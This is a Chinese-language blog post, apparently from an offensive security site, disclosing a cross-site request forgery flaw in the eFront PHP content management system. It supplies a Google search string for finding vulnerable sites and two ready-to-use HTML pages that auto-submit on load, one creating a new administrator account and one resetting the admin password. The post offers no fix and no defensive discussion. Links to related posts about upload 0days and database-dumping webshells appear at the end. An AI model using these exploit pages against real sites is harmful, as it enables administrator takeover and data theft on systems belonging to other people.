eFront添加管理员CSRF漏洞

作者：hack1990 时间：11-06-14 阅读数：682人阅读

eFront是一款针对于中小型企业、学校、政府提供的PHP内容管理系统，由于设计上的缺陷，导致远程添加管理、修改管理配置等多个跨站请求伪造漏洞(CSRF)，该漏洞导致网站敏感信息泄漏。官方网站：http://www.efrontlearning.net/ 漏洞类型：CSRF、跨站请求伪造

谷歌关键词：intext:"Community++ Edition" inurl:/www/index.php
漏洞测试：
<html><head><title>添加管理员CSRF EXP</title></head> <body onload="javascript:fireForms()"><script language="JavaScript"> function fireForms(){ var count = 1; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); }} </script> <form action="http://127.0.0.1/communityplusplus/www/administrator.php?ctg=personal&user=admin&op=profile&add_user=1" method="post" name="user_form" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);"> <input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" /> <table class = "formElements"> <input type="hidden" name="login" / value="caddy-dz"> <input type="hidden" name="password_" / value="caddy-dz"> <input type="hidden" name="passrepeat" / value="caddy-dz"> <input type="hidden" name="name" / value="islem"> <input type="hidden" name="surname" / value="cadi"> <input type="hidden" name="email" / value="caddy-dz@exploit-id.com"> <input type="hidden" name="active" value="0" /><input class="inputCheckbox" id="activeCheckbox" name="active" type="checkbox" value="1" checked="checked" /></td></tr> <td class = "elementCell"><select name="user_type"> <option value="student">Student</option> <option value="professor">Professor</option> <option value="administrator" selected="selected">Administrator</option> </form>
------------------------------------------------------------------------------------------

<html><head><title>修改管理密码CSRF EXP</title></head> <body onload="javascript:fireForms()"><script language="JavaScript"> function fireForms(){ var count = 1; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); }} </script><form action="http://127.0.0.1/communityplusplus/www/administrator.php?ctg=personal&user=admin&op=profile" method="post" name="user_form" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);"> <input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" /> <table class = "formElements"> <input type="hidden" name="login" value="admin" /> <input type="hidden" name="password_" type="password" / value="caddy-dz"> <input type="hidden" name="passrepeat" type="password" / value="caddy-dz"> <input type="hidden" name="name" type="text" value="islem" /> <input type="hidden" name="surname" type="text" value="cadi" /> <input type="hidden" name="email" type="text" value="caddy-dz@exploit-id.com" /> <input type="hidden" name="user_type" value="administrator" /> </form>

原文：http://hi.baidu.com/5427518/blog/item/e959b873809c64048601b072.html

# Nmap Security Scanner 7.0

上一篇：杰奇小说连载系统任意文件上传0day+最新windows提权0day工具应用.

下一篇：拖库涮库专用webshell

eFront添加管理员CSRF漏洞

相关文章

发表评论